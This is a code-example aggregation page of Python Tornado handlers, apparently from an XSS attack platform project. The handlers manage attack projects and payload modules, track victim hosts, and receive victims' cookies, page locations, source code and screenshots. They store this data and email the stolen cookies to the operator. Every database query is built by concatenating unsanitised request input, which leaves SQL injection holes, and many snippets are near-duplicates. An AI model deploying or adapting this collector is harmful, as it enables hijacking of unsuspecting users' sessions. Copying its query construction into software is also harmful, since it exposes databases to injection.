Ejemplo n.º 1
0
	def post(self, id, do):
		if id:
			row=db.ct("module", "*", "id="+id)
			if row:
				description = urlen(self.get_argument('description', 'None'))
				name = urlen(self.get_argument('name', 'None'))
				code = urlen(self.get_argument('code', 'None'))
				addtime = int(time.time())
				db.u(
					"module",
					"description='"+description+"',name='"+name+"',code='"+code+"',addtime="+str(addtime), "id="+id)
				self.redirect("http://"+URL+"/module")
			else:
				self.render('404.html')
		else:
			if do == 'add':
				description = urlen(self.get_argument('description', 'None'))
				name = urlen(self.get_argument('name', 'None'))
				code = urlen(self.get_argument('code', 'None'))
				addtime = int(time.time())
				db.i(
					"module",
					"description,name,code,addtime",
					"'"+description+"','"+name+"','"+code+"','"+str(addtime)+"'")
				self.redirect("http://"+URL+"/module")
			elif do == 'del':
				db.d("module", "id in ("+self.get_argument('id')+")")
			else:
				self.render('404.html')
Ejemplo n.º 2
0
 def on_close(self):
     self.participants.remove(self)
     if self.name != 'manager':
         hostip = base.BaseTransportMixin.sock_headers['Remote-Ip']
         hostid = db.ct('host', 'id', "hostip='" + ip +
                        "' order by id desc limit 1")['id']
         db.u("host", "online=0", "id=" + str(hostid))
Ejemplo n.º 3
0
 def post(self, id, do):
     if id:
         row = db.ct("module", "*", "id=" + id)
         if row:
             description = urlen(self.get_argument('description', 'None'))
             name = urlen(self.get_argument('name', 'None'))
             code = urlen(self.get_argument('code', 'None'))
             addtime = int(time.time())
             db.u(
                 "module", "description='" + description + "',name='" +
                 name + "',code='" + code + "',addtime=" + str(addtime),
                 "id=" + id)
             self.redirect("http://" + URL + "/module")
         else:
             self.render('404.html')
     else:
         if do == 'add':
             description = urlen(self.get_argument('description', 'None'))
             name = urlen(self.get_argument('name', 'None'))
             code = urlen(self.get_argument('code', 'None'))
             addtime = int(time.time())
             db.i(
                 "module", "description,name,code,addtime",
                 "'" + description + "','" + name + "','" + code + "','" +
                 str(addtime) + "'")
             self.redirect("http://" + URL + "/module")
         elif do == 'del':
             db.d("module", "id in (" + self.get_argument('id') + ")")
         else:
             self.render('404.html')
Ejemplo n.º 4
0
    def get(self, projectid, ip, page, do):
        def getname(id):
            return urlde(db.ct("project", "name", "id=" + id)['name'])

        if ip and projectid:
            num = db.c('host',
                       "hostip='" + ip + "' and projectid='" + projectid + "'")
            if num:
                page = str(page and
                           (int(page) - 1 > 0 and
                            (int(page) - 1 < num and int(page) - 1 or 0) or 0)
                           or 0)
                host = db.ct(
                    "host", "*", "hostip = '" + ip + "' and projectid='" +
                    projectid + "' order by id desc limit " + page + ",1")
                if do == 'del':
                    db.d("host", "id=" + str(host['id']))
                    if num == 1:
                        hostlist = json.loads(
                            db.ct("project", "hosts",
                                  "id=" + projectid)['hosts'])
                        hostlist.remove(ip)
                        db.u("project", "hosts='" + json.dumps(hostlist) + "'",
                             "id=" + projectid)
                        self.redirect("http://" + URL + "/project/" +
                                      projectid)
                    self.redirect("http://" + URL + "/host/" + projectid +
                                  "/" + ip)
                else:
                    self.render(
                        "host.html",
                        heads=[
                            {
                                'name': getname(projectid),
                                'title': 'Go to ' + getname(projectid),
                                'url': 'project/' + projectid
                            },
                            {
                                'name': ip,
                                'title': '',
                                'url': ''
                            },
                        ],
                        username=self.get_secure_cookie("username"),
                        datainfo=db.datainfo(),
                        systeminfo=systeminfo(),
                        urlde=urlde,
                        timede=timede,
                        url=URL,
                        urljson=urljson,
                        host=host,
                        num=range(num),
                        page=int(page) + 1,
                    )
            else:
                self.render('404.html')
        else:
            self.render('404.html')
Ejemplo n.º 5
0
	def post(self, id, do):
		if id:
			if do == 'del':
				hostip = self.get_argument('hostip').split(',')
				hostlist = json.loads(db.ct("project","hosts","id="+id)['hosts'])
				hostips = ''
				for x in hostip:
					hostlist.remove(x)
					hostips += "'"+x+"',"
				print hostlist,hostips
				db.u("project", "hosts='"+json.dumps(hostlist)+"'", "id="+id)
				db.d("host", "hostip in ("+hostips[:-1]+") and projectid="+id)
			else:
				row = db.ct("project", "*", "id="+id)
				if row:
					post_data = {}
					for key in self.request.arguments:
						post_data[key] = self.get_arguments(key)
					i = 0
					module = {}
					if 'moduleid' in post_data:
						for key in post_data['moduleid']:
							module[key] = urlen(post_data['modulecustom'][i])
							i += 1
						module = json.dumps(module)
					else:
						module = '[]'
					addtime = int(time.time())
					db.u(
						"project",
						"name='"+urlen(post_data['name'][0])+"',description='"+urlen(post_data['description'][0])+"',email='"+post_data['email'][0]+
						"',custom='"+urlen(post_data['custom'][0])+"',fip='"+post_data['fip'][0]+"',furl='"+post_data['furl'][0]+"',status='"+post_data['status'][0]+
						"',module='"+module+"',addtime="+str(addtime), "id="+id)
					self.redirect("http://"+URL+"/project")
				else:
					self.render('404.html')
		else:
			if do == 'add':
				post_data = {}
				for key in self.request.arguments:
					post_data[key] = self.get_arguments(key)
				i = 0
				module = {}
				if 'moduleid' in post_data:
					for key in post_data['moduleid']:
						module[key]=urlen(post_data['modulecustom'][i])
						i += 1
					module = json.dumps(module)
				else:
					module = '[]'
				addtime = int(time.time())
				db.i(
					"project","name,description,email,custom,fip,furl,status,hosts,module,addtime","'"+urlen(post_data['name'][0])+"','"+
					urlen(post_data['description'][0])+"','"+post_data['email'][0]+"','"+urlen(post_data['custom'][0])+"','"+post_data['fip'][0]+"','"+
					post_data['furl'][0]+"','"+post_data['status'][0]+"','[]','"+module+"','"+str(addtime)+"'")
				self.redirect("http://"+URL+"/project")
			elif do == 'del':
				db.d("project", "id in ("+self.get_argument('id')+")")
Ejemplo n.º 6
0
	def on_open(self, info):
		username = base.BaseTransportMixin.sock_cookies
		row = db.ct("manager", "*", "username='******'")
		if row:
			self.name = 'manager'
		else:
			hostip = base.BaseTransportMixin.sock_headers['Remote-Ip']
			hostid = db.ct('host', 'id', "hostip='"+hostip+"' order by id desc limit 1")['id']
			db.u("host", "online=1", "id="+str(hostid))
			self.name = hostip
		self.participants.add(self)
Ejemplo n.º 7
0
 def on_open(self, info):
     username = base.BaseTransportMixin.sock_cookies
     row = db.ct("manager", "*", "username='******'")
     if row:
         self.name = 'manager'
     else:
         hostip = base.BaseTransportMixin.sock_headers['Remote-Ip']
         hostid = db.ct('host', 'id', "hostip='" + hostip +
                        "' order by id desc limit 1")['id']
         db.u("host", "online=1", "id=" + str(hostid))
         self.name = hostip
     self.participants.add(self)
Ejemplo n.º 8
0
def getaddr(ip):
	url = 'http://ip.taobao.com/service/getIpInfo.php?ip='+ip
	req = urllib2.Request(url)
	res_data = None
	while  res_data == None:
		try:
			res_data = urllib2.urlopen(req).read()
		except:
			pass
	res_data = json.loads(res_data)
	addr = '-'.join((res_data['data']['country'],res_data['data']['region'],res_data['data']['city'],res_data['data']['county'],res_data['data']['isp']))
	db.u('host',"addr = '"+addr + "'","hostip='"+ip+"'")
	return addr
Ejemplo n.º 9
0
Archivo: host.py Proyecto: jjflyxss/xss
    def get(self, projectid, ip, page, do):
        def getname(id):
            return urlde(db.ct("project", "name", "id=" + id)["name"])

        if ip and projectid:
            num = db.c("host", "hostip='" + ip + "' and projectid='" + projectid + "'")
            if num:
                page = str(page and (int(page) - 1 > 0 and (int(page) - 1 < num and int(page) - 1 or 0) or 0) or 0)
                host = db.ct(
                    "host",
                    "*",
                    "hostip = '" + ip + "' and projectid='" + projectid + "' order by id desc limit " + page + ",1",
                )
                if do == "del":
                    db.d("host", "id=" + str(host["id"]))
                    if num == 1:
                        hostlist = json.loads(db.ct("project", "hosts", "id=" + projectid)["hosts"])
                        hostlist.remove(ip)
                        db.u("project", "hosts='" + json.dumps(hostlist) + "'", "id=" + projectid)
                        self.redirect("http://" + URL + "/project/" + projectid)
                    self.redirect("http://" + URL + "/host/" + projectid + "/" + ip)
                else:
                    self.render(
                        "host.html",
                        heads=[
                            {
                                "name": getname(projectid),
                                "title": "Go to " + getname(projectid),
                                "url": "project/" + projectid,
                            },
                            {"name": ip, "title": "", "url": ""},
                        ],
                        username=self.get_secure_cookie("username"),
                        datainfo=db.datainfo(),
                        urlde=urlde,
                        timede=timede,
                        url=URL,
                        urljson=urljson,
                        host=host,
                        num=range(num),
                        page=int(page) + 1,
                    )
            else:
                self.render("404.html")
        else:
            self.render("404.html")
Ejemplo n.º 10
0
	def get(self, projectid, ip, page, do):
		def getname(id):
			return urlde(db.ct("project","name","id="+id)['name'])
		if ip and projectid:
			num = db.c('host', "hostip='"+ip+"' and projectid='"+projectid+"'")
			if num:
				page = str(page and (int(page)-1>0 and (int(page)-1<num and int(page)-1 or 0) or 0) or 0)
				host = db.ct(
					"host",
					"*",
					"hostip = '"+ip+"' and projectid='"+projectid+"' order by id desc limit "+page+",1")
				if do == 'del':
					db.d("host", "id="+str(host['id']))
					if num == 1:
						hostlist = json.loads(db.ct("project", "hosts", "id="+projectid)['hosts'])
						hostlist.remove(ip)
						db.u("project", "hosts='"+json.dumps(hostlist)+"'", "id="+projectid)
						self.redirect("http://"+URL+"/project/"+projectid)
					self.redirect("http://"+URL+"/host/"+projectid+"/"+ip)
				else:
					self.render(
						"host.html",
						heads=[
							{'name':getname(projectid), 'title': 'Go to ' + getname(projectid),
								'url': 'project/'+projectid},
						{'name': ip, 'title': '', 'url': ''},
						],
						username=self.get_secure_cookie("username"),
						datainfo=db.datainfo(),
						systeminfo=systeminfo(),
						urlde=urlde,
						timede=timede,
						url=URL,
						urljson=urljson,
						host=host,
						num=range(num),
						page=int(page)+1,
						)
			else:
				self.render('404.html')
		else:
			self.render('404.html')
Ejemplo n.º 11
0
	def post(self, id, do):
		def getname(id):
			return urlde(db.ct("project", "name", "id="+str(id))['name'])
		hostip = self.request.headers['Remote-Ip']
		information = self.get_argument('information', 'None')
		sourcecode = self.get_argument('code', 'None')
		screen = self.get_argument('screen', 'None')
		receive = self.get_argument('receive', 'None')
		if not information == 'None':
			addtime = int(time.time())
			request = self.request.headers
			headers = {
				'user-agent': urlen('user-agent' in request and request['user-agent'] or 'None'),
				'Accept-Language': urlen('Accept-Language' in request and request['Accept-Language'] or 'None'),
				'X-Forwarded-For': urlen('X-Forwarded-For' in request and request['X-Forwarded-For'] or 'None'),
				'Referer': urlen('Referer' in request and request['Referer'] or 'None'),
				}
			headers = json.dumps(headers)
			db.i(
				'host',
				'hostip,information,headers,projectid,addtime',
				"'"+hostip+"','"+urlen(information)+"','"+headers+"','"+id+"','"+str(addtime)+"'")
			hosts = json.loads(db.ct('project', "hosts", "id="+id)['hosts'])
			hosts.append(hostip)
			db.u("project", "hosts='"+json.dumps(list(set(hosts)))+"'", "id="+id)
			emails = urlde(db.ct("project", "email", "id=" + id)['email']).split(";")
			information = json.loads(information)
			print information
			for email in emails:
				text = 'location : ' + information['location'] + "<p>" +"cookie : " + information['cookie']
				sendmail(email,'The cookie is coming ['+hostip+']', '<h1>project: '+ getname(id) + "</h1><p>" + text)
		hostid = db.ct('host', 'id', "hostip='"+hostip+"' order by id desc limit 1")['id']
		if not sourcecode == 'None':
			db.u('host', "sourcecode='"+urlen(sourcecode)+"'", 'id='+str(hostid))
		if not screen == 'None':
			db.u('host', "screen='"+urlen(screen)+"'", 'id='+str(hostid))
		if not receive == 'None':
			oldreceive = urlde(db.ct(
				'host',
				'receive',
				'id='+str(hostid))['receive'] and db.ct('host', 'receive', 'id='+str(hostid))['receive'] or '')
			oldreceive = oldreceive and json.loads(oldreceive) or oldreceive
			if oldreceive:
				receive = json.loads(receive)
				for key in oldreceive:
					receive[key] = oldreceive[key]
				receive = json.dumps(receive)
			db.u('host', "receive='"+urlen(receive)+"'", 'id='+str(hostid))
		x=db.cts("host", "*", "projectid=5")
		self.write(json.dumps(x))
Ejemplo n.º 12
0
Archivo: get.py Proyecto: jjflyxss/xss
	def post(self, id, do):
		def getname(id):
			return urlde(db.ct("project", "name", "id="+str(id))['name'])
		hostip = self.request.remote_ip
		information = self.get_argument('information', 'None')
		sourcecode = self.get_argument('code', 'None')
		screen = self.get_argument('screen', 'None')
		receive = self.get_argument('receive', 'None')
		if not information == 'None':
			addtime = int(time.time())
			request = self.request.headers
			headers = {
				'user-agent': urlen('user-agent' in request and request['user-agent'] or 'None'),
				'Accept-Language': urlen('Accept-Language' in request and request['Accept-Language'] or 'None'),
				'X-Forwarded-For': urlen('X-Forwarded-For' in request and request['X-Forwarded-For'] or 'None'),
				'Referer': urlen('Referer' in request and request['Referer'] or 'None'),
				}
			headers = json.dumps(headers)
			db.i(
				'host',
				'hostip,information,headers,projectid,addtime',
				"'"+hostip+"','"+urlen(information)+"','"+headers+"','"+id+"','"+str(addtime)+"'")
			hosts = json.loads(db.ct('project', "hosts", "id="+id)['hosts'])
			hosts.append(hostip)
			db.u("project", "hosts='"+json.dumps(list(set(hosts)))+"'", "id="+id)
			emails = urlde(db.ct("project", "email", "id=" + id)['email']).split(";")
			information = json.loads(information)
			print information
			for email in emails:
				text = 'location : ' + information['location'] + "<p>" +"cookie : " + information['cookie']

		hostid = db.ct('host', 'id', "hostip='"+hostip+"' order by id desc limit 1")['id']
		if not sourcecode == 'None':
			db.u('host', "sourcecode='"+urlen(sourcecode)+"'", 'id='+str(hostid))
		if not screen == 'None':
			db.u('host', "screen='"+urlen(screen)+"'", 'id='+str(hostid))
		if not receive == 'None':
			oldreceive = urlde(db.ct(
				'host',
				'receive',
				'id='+str(hostid))['receive'] and db.ct('host', 'receive', 'id='+str(hostid))['receive'] or '')
			oldreceive = oldreceive and json.loads(oldreceive) or oldreceive
			if oldreceive:
				receive = json.loads(receive)
				for key in oldreceive:
					receive[key] = oldreceive[key]
				receive = json.dumps(receive)
			db.u('host', "receive='"+urlen(receive)+"'", 'id='+str(hostid))
		x=db.cts("host", "*", "projectid=5")
		self.write(json.dumps(x))
Ejemplo n.º 13
0
 def post(self, id, do):
     if id:
         if do == "del":
             hostip = self.get_argument("hostip").split(",")
             hostlist = json.loads(db.ct("project", "hosts", "id=" + id)["hosts"])
             for x in hostip:
                 hostlist.remove(x)
                 hostips = "'" + x + "',"
             db.u("project", "hosts='" + json.dumps(hostlist) + "'", "id=" + id)
             db.d("host", "hostip in (" + hostips[:-1] + ") and projectid=" + id)
         else:
             row = db.ct("project", "*", "id=" + id)
             if row:
                 post_data = {}
                 for key in self.request.arguments:
                     post_data[key] = self.get_arguments(key)
                 i = 0
                 module = {}
                 if "moduleid" in post_data:
                     for key in post_data["moduleid"]:
                         module[key] = urlen(post_data["modulecustom"][i])
                         i += 1
                     module = json.dumps(module)
                 else:
                     module = "[]"
                 addtime = int(time.time())
                 db.u(
                     "project",
                     "name='"
                     + urlen(post_data["name"][0])
                     + "',description='"
                     + urlen(post_data["description"][0])
                     + "',email='"
                     + post_data["email"][0]
                     + "',custom='"
                     + urlen(post_data["custom"][0])
                     + "',fip='"
                     + post_data["fip"][0]
                     + "',furl='"
                     + post_data["furl"][0]
                     + "',status='"
                     + post_data["status"][0]
                     + "',module='"
                     + module
                     + "',addtime="
                     + str(addtime),
                     "id=" + id,
                 )
                 self.redirect("http://" + URL + "/project")
             else:
                 self.render("404.html")
     else:
         if do == "add":
             post_data = {}
             for key in self.request.arguments:
                 post_data[key] = self.get_arguments(key)
             i = 0
             module = {}
             if "moduleid" in post_data:
                 for key in post_data["moduleid"]:
                     module[key] = urlen(post_data["modulecustom"][i])
                     i += 1
                 module = json.dumps(module)
             else:
                 module = "[]"
             addtime = int(time.time())
             db.i(
                 "project",
                 "name,description,email,custom,fip,furl,status,hosts,module,addtime",
                 "'"
                 + urlen(post_data["name"][0])
                 + "','"
                 + urlen(post_data["description"][0])
                 + "','"
                 + post_data["email"][0]
                 + "','"
                 + urlen(post_data["custom"][0])
                 + "','"
                 + post_data["fip"][0]
                 + "','"
                 + post_data["furl"][0]
                 + "','"
                 + post_data["status"][0]
                 + "','[]','"
                 + module
                 + "','"
                 + str(addtime)
                 + "'",
             )
             self.redirect("http://" + URL + "/project")
         elif do == "del":
             db.d("project", "id in (" + self.get_argument("id") + ")")
Ejemplo n.º 14
0
	def on_close(self):
		self.participants.remove(self)
		if self.name != 'manager':
			hostip = base.BaseTransportMixin.sock_headers['Remote-Ip']
			hostid = db.ct('host', 'id', "hostip='"+ip+"' order by id desc limit 1")['id']
			db.u("host", "online=0", "id="+str(hostid))
Ejemplo n.º 15
0
 def post(self, id, do):
     if id:
         if do == 'del':
             hostip = self.get_argument('hostip').split(',')
             hostlist = json.loads(
                 db.ct("project", "hosts", "id=" + id)['hosts'])
             for x in hostip:
                 hostlist.remove(x)
                 hostips = "'" + x + "',"
             db.u("project", "hosts='" + json.dumps(hostlist) + "'",
                  "id=" + id)
             db.d("host",
                  "hostip in (" + hostips[:-1] + ") and projectid=" + id)
         else:
             row = db.ct("project", "*", "id=" + id)
             if row:
                 post_data = {}
                 for key in self.request.arguments:
                     post_data[key] = self.get_arguments(key)
                 i = 0
                 module = {}
                 if 'moduleid' in post_data:
                     for key in post_data['moduleid']:
                         module[key] = urlen(post_data['modulecustom'][i])
                         i += 1
                     module = json.dumps(module)
                 else:
                     module = '[]'
                 addtime = int(time.time())
                 db.u(
                     "project", "name='" + urlen(post_data['name'][0]) +
                     "',description='" +
                     urlen(post_data['description'][0]) + "',email='" +
                     post_data['email'][0] + "',custom='" +
                     urlen(post_data['custom'][0]) + "',fip='" +
                     post_data['fip'][0] + "',furl='" +
                     post_data['furl'][0] + "',status='" +
                     post_data['status'][0] + "',module='" + module +
                     "',addtime=" + str(addtime), "id=" + id)
                 self.redirect("http://" + URL + "/project")
             else:
                 self.render('404.html')
     else:
         if do == 'add':
             post_data = {}
             for key in self.request.arguments:
                 post_data[key] = self.get_arguments(key)
             i = 0
             module = {}
             if 'moduleid' in post_data:
                 for key in post_data['moduleid']:
                     module[key] = urlen(post_data['modulecustom'][i])
                     i += 1
                 module = json.dumps(module)
             else:
                 module = '[]'
             addtime = int(time.time())
             db.i(
                 "project",
                 "name,description,email,custom,fip,furl,status,hosts,module,addtime",
                 "'" + urlen(post_data['name'][0]) + "','" +
                 urlen(post_data['description'][0]) + "','" +
                 post_data['email'][0] + "','" +
                 urlen(post_data['custom'][0]) + "','" +
                 post_data['fip'][0] + "','" + post_data['furl'][0] +
                 "','" + post_data['status'][0] + "','[]','" + module +
                 "','" + str(addtime) + "'")
             self.redirect("http://" + URL + "/project")
         elif do == 'del':
             db.d("project", "id in (" + self.get_argument('id') + ")")